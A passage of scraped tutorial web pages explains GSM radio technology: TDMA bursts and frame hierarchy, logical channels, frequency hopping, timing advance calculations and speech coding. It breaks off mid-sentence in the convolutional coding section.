[Back to Top] 
Frequency Correction Burst
This burst is used for frequency synchronization of the mobile station. It is an  
unmodulated carrier that shifts in frequency. It has the same guard time as a normal bit  
(8.25 bits). The broadcast of the FB usually occurs on the logical channel FCCH. 
*The FCCH is discussed in the Logical Channels Tutorial 
Frequency Correction Burst
[Back to Top] 
Synchronization Burst
This burst is used for time synchronization of the mobile. The data payload carries the  
TDMA Frame Number (FN)  and the Base Station Identity Code (BSIC) . It is broadcast 
with the frequency correction burst. The Synchronization Burst is broadcast on the  
Synchronization Channel (SCH) . 
*The SCH is discussed in the Logical Channels Tutorial 
Synchronization Burst
[Back to Top] 
Access Burst
This burst is used the by mobile station for random access. It has a much longer guard  
period (68.25 bits compared to the 8.25 bits in a normal burst). It is designed to  
compensate for the unknown distance of the mobile station from the tower, when the MS  
wants access to a new BTS, it will not know the correct Timing Advance. 
*The RACH is discussed in the Logical Channels Tutorial 
Access Burst
[Back to Top] 
Calculating the Data Throughput
Since each burst has two 57-bit data segments, we can see that a single burst has a data  
payload of 114 bits.
Each burst lasts 576.9 μs, so we can calculate the theoretical bit rate of a single time slot:
     114 bits ÷ 576.9 μs = .1976 bits/μs    (Calculating bits per μs)
     .1976 bits/μs × 1,000,000 = 197,607 bits/sec  nbsp; (Converting μs to sec)
Since there are 8 time slots per carrier frequency, each time slot would only get 1/8 of  
this bit rate, so...
     197,607 bits ÷ 8 = 24,700 bits    (Calculating bit rate for one of eight time slots.)
     24,700 bits ÷ 1000 = 24.7 kbits/sec    (Converting bits to kilobits)
So, using GMSK modulation there is a maximum bit rate of 24.7 kb/s for a single time  
slot. Note that this bit rate does not account for any error correction bits. Any bits used  
for error correction would have to be stolen from the 114-bit data payload of each burst.
[Back to Top] 
TDMA Frame Structure & Hierarchy
TDMA Frame
Each sequence of 8 time slots is known as a TDMA frame. The duration of a TDMA  
frame is 4.615 milliseconds (ms) (576.9 μs × 8).
* Remember that a TDMA frame is 8 time slots and that no one resource will be given an entire TDMA  
frame, the resources must share them.
A TDMA Frame
[Back to Top] 
Multiframe
A Multiframe is composed of multiple TDMA frames.
There are two types of multiframes:
     Control Channel Multiframes
     Traffic Channel Multiframes
*Control Channels and Traffic Channels are explained in Logical Channels Tutorial .
Control Channel Multiframe
     composed of 51 TDMA frames
     duration = 235.4 ms
Control Channel Multiframe
Traffic Channel Multiframe
     composed of 26 TDMA frames
     duration = 120 ms
Traffic Channel Multiframe
Here is a diagram comparing the Control Channel multiframe and a traffic channel  
multiframe.
Traffic Channel and Control Channel Multiframes
The next diagram shows a Traffic Channel (TCH) Multiframe with TS2 (green) being  
allocated to a Mobile Station (MS). The red arrow indicates the sequence of transmission.  
The sequence starts in TDMA frame 0 at TS0, proceeds through all eight time slots, then  
starts again with TDMA frame 1.
In this example, the MS has been allocated a Traffic Channel in TS2. Therefore the MS  
will only transmit/receive during TS2 of each TDMA frame.
Single Time Slot Allocated
[Back to Top] 
Superframe
A Superframe is composed of multiple Multiframes.
Again, there is a superframe for Control Channels and one for Traffic Channels.
Control Channel Superframe
     composed of 26 Control Channel (CCH) multiframes (each CCH multiframe has 51  
TDMA frames)
     duration = 6.12 seconds
Traffic Channel Superframe
     composed of 51 Traffic Channel (TCH) multiframes (each TCH) multiframe has 26  
TDMA frames)
     duration = 6.12 seconds
Each superframe, whether it is a CCH or TCH frame, consists of 1326 TDMA frames (51  
* 26)
*Note: The CCH and TCH frame sequences will synchronize every superframe.
[Back to Top] 
Hyperframe
     A hyperframe is composed of 2048 superframes.
     duration = 3h 28m 53s 76ms (12,533.76 seconds)
     consists of 2,715,548 TDMA frames
Each TDMA frame is numbered according to its sequence within the hyperframe, starting  
from 0 and ending at 2,715,547.
The TDMA frame number within a hyperframe is abbreviated FN. The FN is one of the  
variables used in GSM encryption algorithms.
The following diagram shows the relationship between all of the various time segments  
introduced in this tutorial.
Relationship of All Time Segments
Introduction     Time Slots     Data Rates     Burst Structure     Normal Burst     Frequency Correction Burst  
    Synchronization Burst 
Access Burst     Data Throughput     Frame Structure     TDMA Frame     Multiframes     Superframes     
Hyperframes     
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 
Logical Channels
Signaling Channels     Broadcast Channels  (BCCH  FCCH  SCH  CBCH)      Common Control Channels   
(PCH  RACH  AGCH)
SDCCH     Associated Control Channels   (FACCH  SACCH)      Signal Channel Mapping
Traffic Channels     Encoded Speech     Data     Traffic Channel Mapping      ARFCN Mapping     Frequency 
Hopping 
Home 
Introduction
As you remember from the Introduction to TDMA  tutorial. GSM divides up each  
ARFCN into 8 time slots.
These 8 timeslots are further broken up into logical channels.
Logical channels can be thought of as just different types of data that is transmitted only  
on certain frames in a certain timeslot.
Different time slots will carry different logical channels, depending on the structure the  
BSS uses.
There are two main categories of logical channels in GSM:
Signaling Channels
Traffic Channels (TCH)
Signaling Channels
These are the main types of signaling Channels: Broadcast Channels (BCH)  - 
Transmitted by the BTS to the MS. This channel carries system parameters needed to  
identify the network, synchronize time and frequency with the network, and gain access  
to the network.
Common Control Channels (CCH)  - Used for signaling between the BTS and the MS  
and to request and grant access to the network.
Standalone Dedicated Control Channels (SDCCH)  - Used for call setup.
Associated Control Channels (ACCH)  - Used for signaling associated with calls and  
call-setup. An ACCH is always allocated in conjunction with a TCH or a SDCCH.
*keep in mind, these are only categories of logical channels, they are not logical channels themselves.
The above categories can be divided into the following logical channels:
Broadcast Channels (BCH)
     Broadcast Control Channel (BCCH)
     Frequency Correction Channel (FCCH)
     Synchronization Channel (SCH)
     Cell Broadcast Channel (CBCH)
Common Control Channels (CCCH)
     Paging Channel (PCH)
     Random Access Channel (RACH)
     Access Grant Channel (AGCH)
Standalone Dedicated Control Channel (SDCCH)
     Associated Control Channel (ACCH)
     Fast Associated Control Channel (FACCH)
     Slow Associated Control Channel (SACCH)
[Back to Top]
Let's examine each type of logical channel individually.</A
Broadcast Channels (BCH) 
Broadcast Control Channel (BCCH) - DOWNLINK - This channel 
contains system parameters needed to identify the network and gain  
access. These paramters include the Location Area Code (LAC), the  
Mobile Network Code (MNC), the frequencies of neighboring cells,  
and access parameters. 
Frequency Correction Channel (FCCH) - DOWNLINK - This 
channel is used by the MS as a frequency reference. This channel  
contains frequency correction bursts. 
Synchronization Channel (SCH) - DOWNLINK - This channel is  
used by the MS to learn the Base Station Information Code (BSIC)  
as well as the TDMA frame number (FN). This lets the MS know  
what TDMA frame they are on within the hyperframe.
* The BSIC was covered in the Introduction to GSM  Tutorial. You can also read about the  
numbering schemes used in GSM.
Cell Broadcast Channel (CBCH) - DOWNLINK - This channel is  
not truly its own type of logical channel. The CBCH is for point-to-
omnipoint messages. It is used to broadcast specific information to  
network subscribers; such as weather, traffic, sports, stocks, etc.  
Messages can be of any nature depending on what service is  
provided. Messages are normally public service type messages or  
announcements. The CBCH isnt allocated a slot for itself, it is  
assigned to an SDCCH. It only occurs on the downlink. The CBCH  
usually occupies the second subslot of the SDCCH. The mobile will  
not acknowledge any of the messages.
[Back to Top]
Common Control Channels (CCCH)
Paging Channel (PCH) - DOWNLINK - This channel is used to inform the  
MS that it has incoming traffic. The traffic could be a voice call,  
SMS, or some other form of traffic.
Random Access Channel (RACH) - UPLINK This channel is used  
by a MS to request an initial dedicated channel from the BTS. This  
would be the first transmission made by a MS to access the network  
and request radio resources. The MS sends an Access Burst on this 
channel in order to request access.
Access Grant Channel (AGCH) - DOWNLINK - This channel is  
used by a BTS to notify the MS of the assignement of an initial  
SDCCH for initial signaling.
[Back to Top]
Standalone Dedicated Control Channel (SDCCH) -  
UPLINK/DOWNLINK  - This channel is used for signaling and call  
setup between the MS and the BTS. 
Associated Control Channels (ACCH)
Fast Associated Control Channel (FACCH) - UPLINK/DOWNLINK  - 
This channel is used for control requirements such as handoffs.  
There is no TS and frame allocation dedicated to a FAACH. The  
FAACH is a burst-stealing channel, it steals a Timeslot from a  
Traffic Channel (TCH).
Slow Associated Control Channel (SACCH) -  
UPLINK/DOWNLINK  - This channel is a continuous stream  
channel that is used for control and supervisory signals associated  
with the traffic channels.
[Back to Top]
Signaling Channel Mapping
Normally the first two timeslots are allocated to signaling channels.
Remember that Control Channel (aka signaling channels) are  
composed of 51 TDMA frames. On a time slot Within the  
multiframe, the 51 TDMA frames are divided up and allocated to  
the various logical channels.
There are several channel combinations allowed in GSM. Some of  
the more common ones are:
FCCH + SCH + BCCH + CCCH
BCCH + CCCH
FCCH + SCH + BCCH + CCCH + SDCCH/4(0..3) +  
SACCH/C4(0..3)
SDCCH/8(0 .7) + SACCH/C8(0 . 7)
FCCH + SCH + BCCH + CCCH
Downlink
Uplink
[Back to Top]
BCCH + CCCH
Downlink
Uplink
[Back to Top]
FCCH + SCH + BCCH + CCCH + SDCCH/4(0..3) + SACCH/C4(0..3)
The SACCH that is associated with each SDCCH is only transmitted every  
other multiframe. Each SACCH only gets half of the transmit time  
as the SDCCH that it is associated with. So, in one multiframe,  
SACCH0 and SACCH1 would be transmitted, and in the next  
multiframe, SACCH2 and SACCH3 would be transmitted. The two  
sequential multiframes would look like this:
Downlink

Uplink
You will also notice that the downlink and uplink multiframes do  
not align with each other. This is done so that if the BTS sends an  
information request to the MS, it does not have to wait an entire  
multiframes to receive the needed information. The uplink is  
transmitted 15 TDMA frames behind the downlink. For example,  
the BTS might send an authentication request to the MS on  
SDCCH0 (downlink) which corresponds to TDMA frames 22-25.  
The MS then has enough time to process the request and reply on  
SDCCH0 (uplink) which immediately follows it on TDMA frames  
37-40. 
[Back to Top]
SDCCH/8(0 .7) + SACCH/C8(0 . 7)
Once again, the SACCH that is associated with an SDCCH is only  
transmitted every other multiframe. Two consecutive multiframes  
would look like this:
Downlink
Uplink
[Back to Top]
Traffic Channels (TCH)
Traffic Channels are used to carry two types of information to and from  
the user:
Encoded Speech
Data
There are two basic types of Encoded Speech channels:
Encoded Speech - Encoded speech is voice audio that is converted  
into digital form and compressed. See the Speech Encoding  tutorial 
to see the process.
    Full Rate Speech TCH (TCH/FS) - 13 kb/s
    Half Rate Speech TCH (TCH/HS) - 5.6 kb/s
Data - Data refers to user data such as text messages, picture  
messages, internet browsing, etc. It includes pretty much everything  
except speech. 
    Full rate Data TCH (TCH/F14.1) - 14.4 kb/s
    Full rate Data TCH (TCH/F9.6) - 9.6 kb/s
    Full rate Data TCH (TCH/F4.8) - 4.8 kb/s
    Half rate Data TCH (TCH/F4.8) - 4.8 kb/s
    Full rate Data TCH (TCH/F2.4) - ≤2.4 kb/s
    Half rate Data TCH (TCH/H2.4) - ≤2.4 kb/s
[Back to Top]
Traffic Channel Mapping
Time slots 2 through 7 are normally used for Traffic Channels (TCH)
Traffic Channel Multiframes are composed of only 26 TDMA  
frames. On each multiframe, there are 24 frames for Traffic  
Channels, 1 frame for a SACCH, and the last frame is Idle.  
Remember that a MS (or other device) only gets one time slot per  
TDMA frame to transmit, so in the following diagrams we are  
looking at a single time slot.
Full Rate Traffic Channel (TCH/FS)
When using Half-Rate Speech Encoding (TCH/HS), the speech  
encoding bit rate is 5.6 kb/s, so one time slot can handle two half-
rate channels. In this case, one channel will transmit every other  
TDMA frame, and the other channel would be transmitted on the  
other frames. The final frame (25), which is normally used as an Idle  
frame, is now used as a SACCH for the second half-rate channel.
Half Rate Traffic Channel (TCH/HS)
[Back to Top]
ARFCN Mapping
This diagram shows a sample Multiframe with logical channels mapped to  
time slots and TDMA frames. This is just one possible configuration  
for an ARFCN.
*For illustrative purposes, half of the traffic channels are full-rate  
and the other half are half-rate
TS0
TS1
TS2
TS3
TS4
TS5
TS6
TS7
*Remember that CCH Multiframes have 51 frames and TCH Multiframes only have 26.  
Their sequences will synchronize every superframe.
[Back to Top] 
Offset
Even though GSM uses a full duplex radio channel, the MS and the BTS  
do not transmit at the exact same time. If a MS is assigned a given  
time slot, both the MS and the BTS will transmit during that given  
time slot, but their timing is offset. The uplink is exactly 3 time slots  
behind the downlink. For example, if the MS was allocated a TCH  
on TS3, the BTS would transmit when the downlink is on TS3 and  
the MS is set to receive on TS3. At this point, the uplink is only on  
TS0. Once the uplink reaches TS3, the MS would begin to transmit,  
and the BTS is set to receive on TS3. At this point, the downlink  
would be at TS6. When the MS is not transmitting or receiving, it  
switches frequencies to monitor the BCCH of adjacent cells. 
<CENTER
 
[Back to Top]
Speech Data Throughput
When looking at a Time slot allocated to a TCH, you will notice that TCH  
does not occur on every single frame within a time slot. There is one  
reserved for a SACCH and one that is Idle. So, in a TCH  
Multiframe, only 24 of the 26 frames are used for traffic  
(voice/data). This leaves us with a data throughput of 22.8 kb/s. 
Here is the math: 
1. Calculate bits per TCH Multiframe:
We know that there are 114 bits of data on a single burst, and we  
know that only 24 of the 26 frames in a TCH multiframe are used to  
send user data. 
114 bits × 24 frames = 2736 bits per TCH multiframe 
So, we know that on a single timeslot over the duration of one TCH  
multiframe, the data throughput is 2736 bits. 
2. Calculate bits per millisecond (ms):
From step one above, we know that the throughput of a single TCH  
multiframe is 2736 bits. We also know that the duration of a TCH  
multiframe is 120ms.
2736 bits / 120 ms = 22.8 bits per millisecond 
3. Convert milliseconds (ms) to seconds:
Now we need to put the value into terms of seconds. There are 1000  
milliseconds in a second, so we simply multiply the value by 1000.
22.8 bits/millisecond × 1000 = 22,800 bits per second (22.8 kb/s) 
4. Convert bits to kilobits:
Finally, we want to put it into terms of kilobits per second, wich is  
the most common term for referring to data throughput. We know a  
kilobit is 1000 bits, so we simply divide the term by 1000.
22,800 bits/s ÷ 1000 = 22.8 kb/s 
So now we see why the data throughput of a single allocated timeslot  
is 22.8 kb/s. 
There is an easier method to come to this number:
We know that only 24 of the 26 frames carry data, so we can say that  
the new throughput would be 24/26 of the original throughput. If we  
convert this to decimal form: 
     24÷26 = .9231
We know from the TDMA Tutorial  that the data throughput of a  
single timeslot is 24.7 kb/s. Apply this 24/26 ratio to the 24.7 kb/s  
throughput:
     24.7 × .9231 = 22.8 kb/s
You can see that we get the same answer as above. 
A single BTS may have several Transceivers (TRX) assigned to it,  
each having its own ARFCN, each ARFCN having 8 time slots.
The logical channels that support signaling will normally only be on  
one ARFCN. All of the other ARFCNs assigned to a BTS will  
allocate all 8 time slots to Traffic Channels, to support multiple  
users.
The following diagram is an example of how a medium-sized cell  
might be set up with 4 TRX (ARFCNs).
Sample Medium-Size Cell
[Back to Top]
Frequency Hopping
Each radio frequency Channel (ARFCN) is influenced differently by  
propagation conditions. What affects channel 23 may not affect  
channel 78 at all. Within a given cell, some frequencies will have  
good propagation in a certain area and some will have poor  
propagation in that area. In order to take advantage of the good  
propagation and to defeat the poor propagation, GSM utilizes  
frequency hopping. Frequency hopping means that a transceiver  
hops from one frequency to another in a predetermined sequence. If  
a transceiver hops through all of the avilable frequencies in a cell  
then it will average out the propagation. GSM uses Slow Frequency  
Hopping (SFH). It is considered slow becuase the system hops  
relatively slow, compared with other frequency hopping systems. In  
GSM, the operating frequency is changed every TDMA frame.
The main reason for using slow frequency hopping is because the  
MS must also change its frequency often in order to monitor  
adjacent cells. The device in a transceiver that generates the  
frequency is called a frequency synthesizer . On a MS, a synthesizer  
must be able to change its frequency within the time frame of one  
time slot, which is equal to 577 μs. GSM does not require the BTS to  
utilize frequency hopping. However, a MS must be capable of  
utilizing frequency hopping when told to do so. 
The frequency hopping and timing sequence is known as the  
hopping algorithm . There are two types of hopping algorithms  
available to a MS. 
Cyclic Hopping - The transceiver hops through a predefined list of  
frequencies in sequential order. 
Random Hopping - The transceiver hops through the list of frequencies in  
a random manner. The sequence appears random but it is actually a  
set order.
There are a total of 63 different hopping algorithms available in  
GSM. When the MS is told to switch to frequency hopping mode, the  
BTS will assign it a list of channels and the Hopping Sequence  
Number (HSN), which corresponds to the particular hopping  
algorithm that will be used.
The base channel on the BTS does not frequency hop. This channel,  
located in time slot 0, holds the Broadcast Control Channels which  
the MS needs to monitor to determine strength measurements,  
determine access parameters, and synchronize with the system.
If a BTS uses multiple transceivers (TRX) then only one TRX will  
hold the the Broadcast Channels on time slot 0. All of the other  
TRXs may use time slot 0 for traffic or signaling and may take part  
in the frequency hopping.
There are two types of frequency hopping method available for the  
BTS: synthesizer hopping  and baseband hopping . 
Synthesizer Hopping - This requires the TRX itself to change frequencies  
according to the hopping sequence. So, one TRX would hop between  
multiple frequencies on the same sequence that the MS is required  
to. 
Baseband Hopping - In this method there are several TRX and each one  
stays on a fixed frequency within the hopping frequency plan. Each  
TRX would be assigned a single time slot within a TDMA frame. For  
example, time slot 1 might be assigned to TRX 2 in one TDMA  
frame and in the next TDMA frame it would be assigned to TRX 3,  
and the next frame would be TRX 3. So, the data on each time slot  
would be sent on a different frequency each frame, but the TRXs on  
the BTS do not need to change frequency. The BTS simply routes  
the data to the appropriate TRX, and the MS knows which TRX to  
be on for any given TDMA frame. 
Baseband Frequency Hopping
Signaling Channels     Broadcast Channels  (BCCH  FCCH  SCH  CBCH)      Common Control 
Channels  (PCH  RACH  AGCH)
SDCCH     Associated Control Channels   (FACCH  SACCH)      Signal Channel Mapping
Traffic Channels     Encoded Speech     Data     Traffic Channel Mapping      ARFCN 
Mapping     Frequency Hopping 
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption  
    Timing Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home

Timing Advances
Access Burst     Duration of a Bit     Propagation Delay     Max Cell Size     Determining a TA     Distance 
of a TA     
Home 
` 
Introduction
A Timing Advance (TA) is used to compensate for the propagation delay as the signal  
travels between the Mobile Station (MS) and Base Transceiver Station (BTS). The Base  
Station System (BSS) assigns the TA to the MS based on how far away it perceives the  
MS to be. Determination of the TA is a normally a function of the Base Station  
Controller (BSC), bit this function can be handled anywhere in the BSS, depending on  
the manufacturer.
Time Division Multiple Access (TDMA) requires precise timing of both the MS and BTS  
systems. When a MS wants to gain access to the network, it sends an access burst on the  
RACH. The further away the MS is from the BTS, the longer it will take the access burst  
to arrive at the BTS, due to propagation delay. Eventually there comes a certain point  
where the access burst would arrive so late that it would occur outside its designated  
timeslot and would interfere with the next time slot.
Access Burst
As you recall from the TDMA Tutorial, an access burst has 68.25 guard bits at the end of  
it.
This guard time is to compensate for propagation delay due to the unknown distance of  
the MS from the BTS. It allows an access burst to arrive up to 68.25 bits later than it is  
supposed to without interfering with the next time slot.
68.25 bits doesnt mean much to us in the sense of time, so we must convert 68.25 bits  
into a frame of time. To do this, it is necessary to calculate the duration of a single bit, the  
duration is the amount of time it would take to transmit a single bit.
[Back to Top] 
Duration of a Single Bit
As you recall, GSM uses Gaussian Minimum Shift Keying (GMSK) as its modulation  
method, which has a data throughput of 270.833 kilobits/second (kb/s).
Calculate duration of a bit.
Description Formula Result
Convert kilobits to bits 270.833 kb × 1000 270,833 bits
Calculate seconds per bit 1 sec ÷ 270,833 bits .00000369 seconds
Convert seconds to microseconds .00000369 sec × 1,000,000 3.69 μs
So now we know that it takes 3.69μs to transmit a single bit.
[Back to Top] 
Propagation Delay
Now, if an access burst has a guard period of 68.25 bits this results in a maximum delay  
time of approximately 252μs (3.69μs × 68.25 bits). This means that a signal from the MS  
could arrive up to 252μs after it is expected and it would not interfere with the next time  
slot.
The next step is to calculate how far away a mobile station would have to be for a radio  
wave to take 252μs to arrive at the BTS, this would be the theoretical maximum distance  
that a MS could transmit and still arrive within the correct time slot. 
Using the speed of light, we can calculate the distance that a radio wave would travel in a  
given time frame. The speed of light (c) is 300,000 km/s. 
Description Formula Result
Convert km to m 300,000km × 1000 300,000,000m 
Convert m/s to m/μs 300,000,000 ÷ 1,000,000 300 m/μs
Calculate distance for 252μs 300 m/μs × 252μs 75600m 
Convert m to km 75,600m ÷ 1000 75.6km
So, we can determine that a MS could theoretically be up to 75.6km away from a BTS  
when it transmits its access burst and still not interfere with the next time slot.
However, we must take into account that the MS synchronizes with the signal it receives  
from the BTS. We must account for the time it takes for the synchronization signal to  
travel from the BTS to the MS. When the MS receives the synchronization signal from  
the BTS, it has no way of determining how far away it is from the BTS. So, when the MS  
receives the syncronization signal on the SCH, it synchronizes its time with the timing of  
the system. However, by the time the signal arrives at the MS, the timing of the BTS has  
already progressed some. Therefore, the timing of the MS will now be behind the timing  
of the BTS for an amount of time equal to the travel time from the BTS to the MS.
For example, if a MS were exactly 75.6km away from the BTS, then it would take 252μs  
for the signal to travel from the BTS to the MS. 
The MS would then synchronize with this timing and send its access burst on the RACH.  
It would take 252μs for this signal to return to the BTS. The total round trip time would  
be 504μs. So, by the time the signal from the MS arrives at the BTS, it will be 504μs  
behind the timing of the BTS. 504μs equals about 136.5 bits. 
The 68.25 bits of guard time would absorb some of the delay of 136.5 bits, but the access  
burst would still cut into the next time slot a whopping 68.25bits. 
[Back to Top] 
Maximum Size of a Cell
In order to compensate for the two-way trip of the radio link, we must divide the  
maximum delay distance in half. So, dividing 75.6km in half, we get approximately 37.8  
km. If a MS is further out than 37.8km and transmits an access burst it will most likely  
interfere with the following time slot. Any distance less than 37.8km and the access burst  
should arrive within the guard time allowed for an access burst and it will not interfere  
with the next time slot.
In GSM, the maximum distance of a cell is standardized at 35km. This is due mainly to  
the number of timing advances allowed in GSM, which is explained below.
[Back to Top] 
How a BSS Determines a Timing Advance
In order to determine the propagation delay between the MS and the BSS, the BSS uses  
the synchronization sequence within an access burst. The BSS examines the  
synchronization sequence and sees how long it arrived after the time that it expected it to  
arrive. As we learned from above, the duration of a single bit is approximately 3.69μs.  
So, if the BSS sees that the synchronization is late by a single bit, then it knows that the  
propagation delay is 3.69μs. This is how the BSS knows which TA to send to the MS.
For each 3.69μs of propagation delay, the TA will be incremented by 1. If the delay is  
less than 3.69μs, no adjustment is used and this is known as TA0. For every TA, the MS  
will start its transmission 3.69μs (or one bit) early. Each TA really corresponds to a range  
of propagation delay. Each TA is essentially equal to a 1-bit delay detected in the  
synchronization sequence.
TAFromTo
0 0μs 3.69μs
1 3.69μs7.38μs
2 7.38μs11.07μs
3 11.07μs14.76μs
... ... ... 
63232.47μs236.16μs
[Back to Top] 
The Distance of a Timing Advance
When calculating the distances involved for each TA, we must remember that the total  
propagation delay accounts for a two-way trip of the radio wave. The first leg is the  
synchronization signal traveling from the BTS to the MS, and the second leg is the access  
burst traveling from the MS to the BTS. If we want to know the true distance of the MS  
from the BTS, we must divide the total propagation delay in half. 
For example, if the BSS determines the total propagation delay to be 3.69μs, we can  
determine the distance of the MS from the BTS. 
Description FormulaResult
Determine one-way propagation time 3.69μs ÷ 21.845μs
Calculate distance
(using speed of light.)300 m/μs × 1.845μs 553.5m
We determined earlier that for each propagation delay of 3.69μs the TA is inceremented  
by one. We just learned that a propagation delay of 3.69μs equals a one-way distance of  
553.5 meters. So, we see that each TA is equal to a distance of 553.5 meters from the  
tower. Starting from the BTS (0 meters) a new TA will start every 553.5m.
TA RingStartEnd
0 0553.5m
1 553.5m1107m
2 1107m1660.5m
3 1660.5m2214m
... ... ... 
6334.87km35.42km
The TA becomes very important when the MS switches over to using a normal burst in  
order to transmit data. The normal burst does not have the 68.25 bits of guard time. The  
normal burst only has 8.25 bits of guard time, so the MS must transmit with more precise  
timing. With a guard time of 8.25 bits, the normal burst can only be received up to  
30.44μs late and not interfere with the next time slot. Because of the two-way trip of the  
radio signal, if the MS transmits more than 15.22μs after it is supposed to then it will  
interfere with the next time slot.
Access Burst     Duration of a Bit     Propagation Delay     Max Cell Size     Determining a TA     Distance 
of a TA     
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 

GSM Events
IMSI Attach     IMSI Detach     Location Update     Mobile-Originated Call      Mobile-Terminated Call      
Home 
Whenever a Mobile Station (MS) needs some kind of service from the network, a series  
of messages are sent across different links in order to facilitate this service. Some  
examples include Location Update, IMSI Attach, IMSI Detach, and placing and receiving  
calls. These tutorials illustrate some of the different tasks that are needed to facilitate  
service and the messages that are exchanged in order to complete those tasks. Choose one  
of the events from the menu above to view how it works. 
Authentication and encryption are not considered an "event" since it is required every  
time the MS requests access to the network. Authentication and encryption is covered in  
detail here. 
*Note: For all GSM events, only the signaling messages for the Air (Um) Interface are  
specified on this website. In the future, messages for all interfaces will be included on the  
website. 
IMSI Attach     IMSI Detach     Location Update     Mobile-Originated Call      Mobile-Terminated Call      
Introduction     Architecture     TDMA     Logical Channels     Authentication & Encryption      Timing 
Advances     Speech Encoding     GSM Events 
Updates     Bulletin Board     Sitemap     Contact Me 
Home 

Speech Coding
Analog/Digital Conversion      Speech Coding     Block Coding     Convolutional Coding     Reordering & 
Partioning     
Home 
Analog to Digital Conversion
In order to fully understand speech and channel coding it is easier to start from the very  
beginning of the process. The first step in speech coding is to transform the sound waves  
of our voices (and other ambient noise) into an electrical signal. This is done by a  
microphone. A microphone consists of a diaphragm, a magnet, and a coil of wire. When  
you speak into it, sound waves created by your voice vibrate the diaphragm which is  
connected to the magnet which is inside the coil of wire. These vibrations cause the  
magnet to move inside the coil at the same frequency as your voice. A magnet moving in  
a coil of wire creates an electric current. This current which is at the same frequency as  
the sound waves is carried by wires to whereever you wish it to go like an amplifier,  
transmitter, etc. Once it gets to its destination the process is reversed and it comes out as  
sound. Speakers basically being the opposite of microphones. The signal created by a  
microphone is an analog signal. Since GSM is an all digital system, this analog signal is  
not suitable for use on a GSM network. The analog signal must be converted into digital  
form. This is done by using an Analog to Digital Converter (ADC). 
In order to reduce the amount of data needed to represent the sound wave, the analog  
signal is first inputted into a band pass filter. Band pass means that the filter only allows  
signal that fall within a certain frequency range to pass through it, and all other signals  
are cut off, or attenuated. The BP filter only allows frequencies between 300Hz and 3.4  
kHz to pass through it. This limits the amount of data that the Analog/Digital Converter is  
required to process. 
Band Pass Filter
The filtered signal is inputted into the analog/digital converter. The analog/digital  
converter performs two tasks. It converts an analog signal into a digital signal and it does  
the opposite, converts a digital signal into an analog signal. 
In the case of a cell phone, the analog signal created by a microphone is passed to the  
analog/digital converter. The A/D converter measures the analog signal, or samples it 
8000 times per second. This means that the ADC takes a sample of the analog signal  
every .125 sec (125 μs). Each sample is quantified with a 13-bit data block. If we  
calculate 13 bits per sample at 8000 samples per second, we determine a data rate of  
104,000 bits per second, or 104 kb/s. 

Analog/Digital Converter
A data rate of 104 kbps is far too large to be economically handled by a radio transmitter.  
In order to reduce the bitrate, the signal is inputted into a speech encoder.A speech  
encoder is a device that compresses the data of a speech signal. There are many types of  
speech encoding schemes available. The speech encoder used in GSM is called Linear  
Predictive Coding (LPC) and Regular Pulse Excitation (RPE). LPC is a very complicated  
and math-heavy process, so it will only be summarized here. 
[Back to Top] 
Linear Predictive Coding (LPC)
Remember that the ADC quantifies each audio sample with a 13-bit "word". In LPC, 160  
of the 13-bit samples from the converter are saved up and stored into short-term memory.  
Remember that a sample is taken every 125 μs, so 160 samples covers an audio block of  
20ms. This 20ms audio block consists of 2080 bits. LPC-RPE analyzes each 20ms set of  
data and determines 8 coefficients used for filtering as well as an excitation signal. LPC  
basically identifies specific bits that correspond to specific aspects of human voice, such  
as vocal modifiers (teeth, tongue, etc.) and assigns coefficients to them. The excitation  
signal represents things like pitch and loudness. LPC identifies a number of correlations  
of human voice and redundancies in human speech and removes them. 
The LPC/RPE sequence is then fed into the Long-Term Prediction (LTP) Analysis  
function. The LTP function compares the sequence it receives with earlier sequences  
stored in its memory and selects the sequence that most resembles the current sequence.  
The LTP function then calculates the difference between the two sequences. Now the  
LTP function only has to translate the difference value as well as a pointer indicating  
which earlier sequence it used for comparison. By doing this is prevents encoding  
redundant data. 
You can envision this by thinking about the sounds we make when we talk. When we  
pronounce a syllable, each little sound has a specific duration that seems short when we  
are talking but often lasts longer than 20ms. So, one sound might be represented by  
several 20ms-block of exactly the same data. Rather than transmit redundant data, LPC  
only includes data that tells the receiving which data is redundant so that it can be created  
on the receiving end. 
Using LPC/RPE and LTP, the speech encoder reduces the 20ms block from 2,080 bits to  
to 260 bits. Note that this is a reduction by eight times. 260 bits every 20ms gives us a net  
data rate of 13 kilobits per second (kbps). 
Speech Encoding
This bitrate of 13kbps is known as Full Rate Speech (FS). There is another method for  
encoding speech called Half Rate Speech (HS), which results in a bit rate of  
approximately 5.6kbps. The explanations in the remainder of this tutorial are based on a  
full-rate speech bitrate (13kbps). 
Calculate the net data rate:
Description Formula Result
Convert ms to sec 20 ms ÷ 1000 .02 seconds
Calculate bits per second 260 bits ÷ .02 seconds 13,000 bits per second (bps)
Convert bits to kilobits 13,000 bps ÷ 1000 13 kilobits per sec (kbps) 
As we all know, the audio signal must be transmitted across a radio link from the handset  
to the Base Station Transceiver (BTS). The signal on this radio link is subject to  
atmospherics and fading which results in a large amount of data loss and degrades the  
audio. In order to prevent degradation of audio, the data stream is put through a series of  
error detection and error correction procedures called channel coding. The first phase of  
channel coding is called block coding. 
[Back to Top] 
Block Coding
A single 260-bit (20ms) audio block is delivered to the block-coder. The 260 bits are  
divided up into classes according to their importance in reconstructing the audio. Class I  
are the bits that are most important in reconstructing the audio. The class II bits are the  
less important bits. Class I bits are further divided into two categories, Ia and Ib. 
Classes of Bits
The class Ia bits are protected by a cyclic code. The cyclic code is run on the 50 Ia bits  
and calculates 3 parity bits which are then appended to the end of the Ia bits. Only the  
class Ia bits are protected by this cyclic code. The Ia and Ib bits are then combined and an  
additional 4 bits are added to the tail of the class I bits (Ia and Ib together). All four bits  
are zeros (0000) and are needed for the next step which is "convolutional coding". There  
is no protection for class II bits. As you can see, block coding adds seven bits to the audio  
block, 3 parity bits and 4 tail bits, therefore, a 260-bit block becomes a 267-bit block. 
Block Coding
[Back to Top] 
Convolutional Coding
This 267-bit block is then inputted into a convolutional code. Convolutional coding  
allows errors to be detected and to be corrected to a limited degree. The class I  
